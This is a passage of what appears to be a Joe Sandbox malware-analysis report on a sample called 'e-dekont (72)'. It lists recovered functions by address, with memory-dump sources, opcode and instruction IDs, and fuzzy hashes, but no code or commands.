                                                                • Instruction ID: 62a78aa6136e18623a667da2b17fd8f0aef71e32d68bb0f75d0c74955e3f1c0b
                                                                • Opcode Fuzzy Hash: cefe86b29cac9e5da2f1b7ecdd78aa44e50af6301d43c832e7fcea1bee28f1c2
                                                                • Instruction Fuzzy Hash: D8E0C231441108DFC741FFB4C904A9EBBF9EB09305F0044A5D50997221EB754A04D791
                                                                Function 02E1F638 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65422114817bf71370f83ddfb9819294cacded0ec00ae744a8957320d05a0c05
                                                                • Instruction ID: a20f1eab30fe4e80e478e117e9fc918a82b60c7d95af0d3bbd646b76e2d6bf54
                                                                • Opcode Fuzzy Hash: 65422114817bf71370f83ddfb9819294cacded0ec00ae744a8957320d05a0c05
                                                                • Instruction Fuzzy Hash: 78E01274949208DFCB04DF94D5455ACBBB8EB85319F10D1ADD80867362CB329E52DBC1
                                                                Function 06FAE358 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8725e9113f58202ed70213beac60ed3c5240229aa75b5cee0c301108f6095feb
                                                                • Instruction ID: 8505cbebd26dc631d6f06ba9e26bd5172f65e59f263841e40d5a5cb64a3e0059
                                                                • Opcode Fuzzy Hash: 8725e9113f58202ed70213beac60ed3c5240229aa75b5cee0c301108f6095feb
                                                                • Instruction Fuzzy Hash: 90E01274D09308EFD744DF98D5425ACBFB8EB45315F10C19DD84817362CA329E52DB81
                                                                Function 06C304B4 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9f534a7b83f51d71d8dacaac5610a42a54953b564d28a58899011a2f4860cc2
                                                                • Instruction ID: fe75bb94f05fe10205658f9bffb85c21a4507c5c710b6efe9f9ffec8db678e9f
                                                                • Opcode Fuzzy Hash: f9f534a7b83f51d71d8dacaac5610a42a54953b564d28a58899011a2f4860cc2
                                                                • Instruction Fuzzy Hash: 0BF06DB4A05258DFEB10DF25D8A8B9C7BB1FB66302F0002D9D109A3366DB340E85CF50
                                                                Function 06C30906 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52e8f2f483ed3e71ce414cde49263929ae7c1b41aa073053e856e8cbb2558370
                                                                • Instruction ID: 549bcba59e61c3bdf52beeef9c662621e5ce0dcaade270da5b8c4d9e5030fe5e
                                                                • Opcode Fuzzy Hash: 52e8f2f483ed3e71ce414cde49263929ae7c1b41aa073053e856e8cbb2558370
                                                                • Instruction Fuzzy Hash: 71E01A74B00198CFEB40DFA9E098BACBBF2FB99315F604029E101E7658CB344884CF11
                                                                Function 05991D98 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction ID: 3364dd5e15258c84f0065f11335007b277d00d3d5d39c2482ac1d5c7607c8e02
                                                                • Opcode Fuzzy Hash: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction Fuzzy Hash: F0E01234949108DFCB08DF98E5415ACBBB9FB85315F14819DD8091B356CA32AE92DB81
                                                                Function 059979B8 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da47d95a8adfded780955b6e876055ec96876931c7aae1f4ab2763f1fec8b21c
                                                                • Instruction ID: 17d29cabf2b2ac473286bede85cd23b691b3ff4b0c50241ef2e865faa7b1dcef
                                                                • Opcode Fuzzy Hash: da47d95a8adfded780955b6e876055ec96876931c7aae1f4ab2763f1fec8b21c
                                                                • Instruction Fuzzy Hash: 0AE0C27148110C9FDB80EFF8C900A9E77E9DB09200F0040A5940993211EE728A00D7A1
                                                                Function 05990DA8 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 845ef5b8d5c7ddda448b060afb5081adb6b1c44b0bc2a81b9ea2b717f376dc7c
                                                                • Instruction ID: 5f0502888ed72f9126b800a93aaa505235bde97f0ad4af21590e98d871db81d0
                                                                • Opcode Fuzzy Hash: 845ef5b8d5c7ddda448b060afb5081adb6b1c44b0bc2a81b9ea2b717f376dc7c
                                                                • Instruction Fuzzy Hash: 2FE01274D1A25CEFCB54EFBCD5496ADBBF8AB44201F1040A9881993395E7715A90C741
                                                                Function 05997FC8 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction ID: 20875212688bacedb01f3ed067926b857724a7a78342ae19b769a4f8af9c68b2
                                                                • Opcode Fuzzy Hash: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction Fuzzy Hash: 78E01234919108DFCB08DFE8D9419ACBBB9EF4A315F20819DD80927352DA329E52DB81
                                                                Function 05998AC0 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction ID: 41283e67e9d8bededed539e7463b5826ad09f98f24c93889f8480f0f4f3629a7
                                                                • Opcode Fuzzy Hash: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction Fuzzy Hash: 45E0123590A108DFCB08DF98D5419ADBBB9EB46315F10819DD80967352C732AE52DB81
                                                                Function 05991620 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction ID: 2819fc53be8e01153bffbfa0b9dddb48b797683895216390ee0a0484f4cfaaf0
                                                                • Opcode Fuzzy Hash: 7a0c69c2f6c9c69824786238736dcc5328cd78bf97145dbe72c6ff143d5eb45a
                                                                • Instruction Fuzzy Hash: E2E0C234D0910CDFCB08DF98D5415ACBBB8FB45304F54809CC80817382C632AE03EB90
                                                                Function 06AEFD20 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aea52db671c11d82e9537568aee8e360669d0958e4f4f3dfd78865c422fb39f1
                                                                • Instruction ID: f75c5db3a8d0980dcdee302df9ce9856de85808db993d6ba79cdc25ac4cd82db
                                                                • Opcode Fuzzy Hash: aea52db671c11d82e9537568aee8e360669d0958e4f4f3dfd78865c422fb39f1
                                                                • Instruction Fuzzy Hash: 26E08C74C06208DFC780EFA8D4456ACBFF8EB08205F1000A88908D3351E6304A40CB40
                                                                Function 06AE62F0 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b823a0b71f1617fc5d3da7dac81d0894c029c5450d43e12eef1fb595b6b18c2f
                                                                • Instruction ID: 8d2174511e0efc45a7f48c8bafc6d214b266d612a83a8ea2942d32259136373f
                                                                • Opcode Fuzzy Hash: b823a0b71f1617fc5d3da7dac81d0894c029c5450d43e12eef1fb595b6b18c2f
                                                                • Instruction Fuzzy Hash: 29E0C27188110CDFC781FFF4C900A9EBBF9DB09200F0045A5940497211EA754E00D7A1
                                                                Function 06C3E740 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0fce0d1beba6926c3f66d9ea328514d6975980c2a52bc4ee2325c88477e775b
                                                                • Instruction ID: 873024bb32b186b74ac263064c353c36ce4e0a89976a56f37e488f142598dab3
                                                                • Opcode Fuzzy Hash: f0fce0d1beba6926c3f66d9ea328514d6975980c2a52bc4ee2325c88477e775b
                                                                • Instruction Fuzzy Hash: 2AD012252161A49FCB827620A8244D63FAE9FC546734541A7F0ADC326BCA190966C7A5
                                                                Function 06C33540 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e8fdf156576314341f7b4bc8607f02ff33592da1d32a2c8067d8fb84d5c24e1
                                                                • Instruction ID: be453c67c7e21d2afb808dd5d1ca3d6fe194ead358380a6c691f1b2ea5d5c0c2
                                                                • Opcode Fuzzy Hash: 7e8fdf156576314341f7b4bc8607f02ff33592da1d32a2c8067d8fb84d5c24e1
                                                                • Instruction Fuzzy Hash: 02E01274A0120CEFCB04EFB5E961A6D77BAEB94204F1045ADD9059B344DA356E04DB91
                                                                Function 05992878 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5a787e7e803a1f4e24d6c31371ccb05878eb7273d840545a1f1c1f14e79d3575
                                                                • Instruction ID: 05ba9c5994ed16e7ba5a7dd327c5d65c7eab09e8378d2eab874bfb24a74846b3
                                                                • Opcode Fuzzy Hash: 5a787e7e803a1f4e24d6c31371ccb05878eb7273d840545a1f1c1f14e79d3575
                                                                • Instruction Fuzzy Hash: C3E0C238809108EFCB48DFA8C5012BCBFF8AB09205F1080DDC85857382D6369E01CB40
                                                                Function 05990A00 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5a787e7e803a1f4e24d6c31371ccb05878eb7273d840545a1f1c1f14e79d3575
                                                                • Instruction ID: da4bd96b8a0be6c7c354311a2004250d82951c437298196ed6e266e034ac1d4d
                                                                • Opcode Fuzzy Hash: 5a787e7e803a1f4e24d6c31371ccb05878eb7273d840545a1f1c1f14e79d3575
                                                                • Instruction Fuzzy Hash: E4E0C23080A10CDFCB44DFA8C5092BCBFF8EB09205F1080EDC81867382D6329E82CB81
                                                                Function 06AD9E88 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75eb58c762dbabb2b5aa0b8c771a692b80310a22244960f4be9503537afc98a4
                                                                • Instruction ID: 4168549c9a8942bf970d8462908637871bc512f55506b79e4d71df09c6006e7e
                                                                • Opcode Fuzzy Hash: 75eb58c762dbabb2b5aa0b8c771a692b80310a22244960f4be9503537afc98a4
                                                                • Instruction Fuzzy Hash: F4D05E34509208EFD754DB94D501AAAB7B8EB4A215F10809C980947352CA33DE01C780
                                                                Function 06AD9280 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75eb58c762dbabb2b5aa0b8c771a692b80310a22244960f4be9503537afc98a4
                                                                • Instruction ID: 64634a48d5afb1a1c32d7a7b0ca493fa9001605bcecbf03ac07414e6a40db23c
                                                                • Opcode Fuzzy Hash: 75eb58c762dbabb2b5aa0b8c771a692b80310a22244960f4be9503537afc98a4
                                                                • Instruction Fuzzy Hash: 55D05E34549108EFD754DB94D501AA9B7BCDB4A218F1480DC980D5B352CA32DD02C781
                                                                Function 02E1CFE0 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d71f1ac97cbe7830eca3e503a77405a0ff18bbafb552bcde27e6fc8d51224bf1
                                                                • Instruction ID: f7a28e81d731f90812f9c921263edea3685dbac95750a61e71eacc538b42661c
                                                                • Opcode Fuzzy Hash: d71f1ac97cbe7830eca3e503a77405a0ff18bbafb552bcde27e6fc8d51224bf1
                                                                • Instruction Fuzzy Hash: F4D05E31589108DFC714CA99D505AE8B7ECDB4E218F20A0AD9818A7392CA329D01C741
                                                                Function 06C3577A Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4d855d572095e45279f81d0fe3317b1a6fae310b4a26a9c046f9582f7a82d3f1
                                                                • Instruction ID: 9197e8e15b1c902f29f47fa467ca85b3b253e114013e4a23b469d06d3f646cfc
                                                                • Opcode Fuzzy Hash: 4d855d572095e45279f81d0fe3317b1a6fae310b4a26a9c046f9582f7a82d3f1
                                                                • Instruction Fuzzy Hash: D0E0E23A6800049FDB48DB58EA95A89B771FF48350F6081A2E6019F275C732ED56CB90
                                                                Function 06C330F0 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de69b381d8b751817cb0892380bf8efa2b9103296d396ee7be303e75299b773a
                                                                • Instruction ID: e06180a3fd67a757aef50dcec2c655e24121e2ea20f441953ebdfc6c392e37d2
                                                                • Opcode Fuzzy Hash: de69b381d8b751817cb0892380bf8efa2b9103296d396ee7be303e75299b773a
                                                                • Instruction Fuzzy Hash: 4BE01270A0110DEFCB40EFA9E51069D77F9EB84204F1045ADD509D7344EA315E049BD1
                                                                Function 05992B40 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 135c9e65d532c3eeecc2727aba076d3eba5d8d588f5c0c84d8434aa327b21780
                                                                • Instruction ID: a1cb856e1a977569fc516d7f8cb78e9f280f1c0df185ac7bf20063684cb1cd7f
                                                                • Opcode Fuzzy Hash: 135c9e65d532c3eeecc2727aba076d3eba5d8d588f5c0c84d8434aa327b21780
                                                                • Instruction Fuzzy Hash: ACD05E34509108EFCF08CF98D501A68B7ECEB4A215F10809C981D5B352CA329D02D780
                                                                Function 06C3063E Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eab383aa96ed3b5f0e6ad6d0d95c28d495bc22604a67f7fe86c3484696a00024
                                                                • Instruction ID: e611824c704d562b9de297f82594d3ec5ba4c107cb586ae15010caf34d631122
                                                                • Opcode Fuzzy Hash: eab383aa96ed3b5f0e6ad6d0d95c28d495bc22604a67f7fe86c3484696a00024
                                                                • Instruction Fuzzy Hash: A9E01AB4A001188FCB10DF25D594BDE77B2FB69300F100099D20AA3354CB345EC48F51
                                                                Function 06C3040A Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fc733e4a49f60966283199ef2d5333addec701ca73509b7b163c74134da83c3
                                                                • Instruction ID: 8c5ba6f4b87c0a54360c3623abe161ddbc93fb4e839d98d23c1a08d156d3dca2
                                                                • Opcode Fuzzy Hash: 9fc733e4a49f60966283199ef2d5333addec701ca73509b7b163c74134da83c3
                                                                • Instruction Fuzzy Hash: 8DE0E574A022598FEB549F25E854B9C7AB2FB99310F1081DAD10AA3354CE305D84CF61
                                                                Function 06C302D2 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fbf6643bf0c36b2eed75d1a4a914a846a3d3a8d65ba7f642a7d4f1ef190f658
                                                                • Instruction ID: b89fe99fd8210b124742841755e8aa5f6fa542774c54e5d92f499594b75e7dbf
                                                                • Opcode Fuzzy Hash: 5fbf6643bf0c36b2eed75d1a4a914a846a3d3a8d65ba7f642a7d4f1ef190f658
                                                                • Instruction Fuzzy Hash: 0DE04F74A1511ACFCBA4EF24E4547BC77B2FB5D300F0002A9810AA7756DB301D808F95
                                                                Function 06C3027C Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b45ee44a2bda7d832ddfe810394fecb9dfadb75f1435ba22c3617a26e8543319
                                                                • Instruction ID: c37de31c45a6248f78657bdb13dbd000228610c7b6bf2839af60ab376b0ec731
                                                                • Opcode Fuzzy Hash: b45ee44a2bda7d832ddfe810394fecb9dfadb75f1435ba22c3617a26e8543319
                                                                • Instruction Fuzzy Hash: 31E01AB4A01299CFEB14EF61E868B9C7772FB55300F10809AD60AA3394CA305D41CF60
                                                                Function 06C30AB7 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b9e68c40320c0a8f6b57a9095d6688de8287f186e1d819354946d93d9756bcf
                                                                • Instruction ID: 9812a06fd846e9deac2d1eb90c8195a989b6d09f1c2280d6aa58c19b87068227
                                                                • Opcode Fuzzy Hash: 0b9e68c40320c0a8f6b57a9095d6688de8287f186e1d819354946d93d9756bcf
                                                                • Instruction Fuzzy Hash: 51E01A78A0021C8FCB54EF24D86879DB772FB96301F50419A910AA7354CB309D80CF12
                                                                Function 06C309C4 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a42dabb7cc3d3d3f7a2f7373075bb413a4aff236d5108051cfa0a19e99cef0fc
                                                                • Instruction ID: 4bc85af0e2c9d903141283893d33d4ac85d4b6d3d6de2eaff68d432c4c83e16b
                                                                • Opcode Fuzzy Hash: a42dabb7cc3d3d3f7a2f7373075bb413a4aff236d5108051cfa0a19e99cef0fc
                                                                • Instruction Fuzzy Hash: 78E01A74A082188BCB50DF24D85469E77B2FB69305F100199814AA3354CF311DC0CF15
                                                                Function 05992275 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5befc8659ebe1f5d4dc9af52d32f7b154aa9e7dea78c500c2291eb751fc2f14
                                                                • Instruction ID: 97089e53c0faf5d8a0330fd0b7c695cf9c9057465bb2cf1b2c5e070b7f25e0f8
                                                                • Opcode Fuzzy Hash: a5befc8659ebe1f5d4dc9af52d32f7b154aa9e7dea78c500c2291eb751fc2f14
                                                                • Instruction Fuzzy Hash: 75E0B678A04218DBCF08EF98E05479CB7B2FB55301F50505AD105A7254CB309940CF11
                                                                Function 06ADCEF7 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 57b52fe3b64a44cff56fc9b016b6412d5e4533d4aa6b65622141ea622dc201e4
                                                                • Instruction ID: 3bd28515019d3e00ab753da957f5d5ae8938ca9cc827d6f3d62e539272aa47b4
                                                                • Opcode Fuzzy Hash: 57b52fe3b64a44cff56fc9b016b6412d5e4533d4aa6b65622141ea622dc201e4
                                                                • Instruction Fuzzy Hash: E0E017B8A052088FEB10DF64C894BDDBBF2FB5A310F44909AD506B7344CB344A80CF91
                                                                Function 06AD0820 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 010c1c9b37e048a28a4719ce19e015caf000824a2c2f177979d31613c1831fe0
                                                                • Instruction ID: cf6312e0b883e690961d7a7a899d9bea2bde09813cfdab839620e86c304e73d9
                                                                • Opcode Fuzzy Hash: 010c1c9b37e048a28a4719ce19e015caf000824a2c2f177979d31613c1831fe0
                                                                • Instruction Fuzzy Hash: 17D012F7255254AFC7419B64E854C857F74DF1A36134641D1F548CF232D621CD51C790
                                                                Function 02E10917 Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 229d0fed243a138efe82b51955a5e9b144e1b27c8afbfb4e6e74cdac4f6a0318
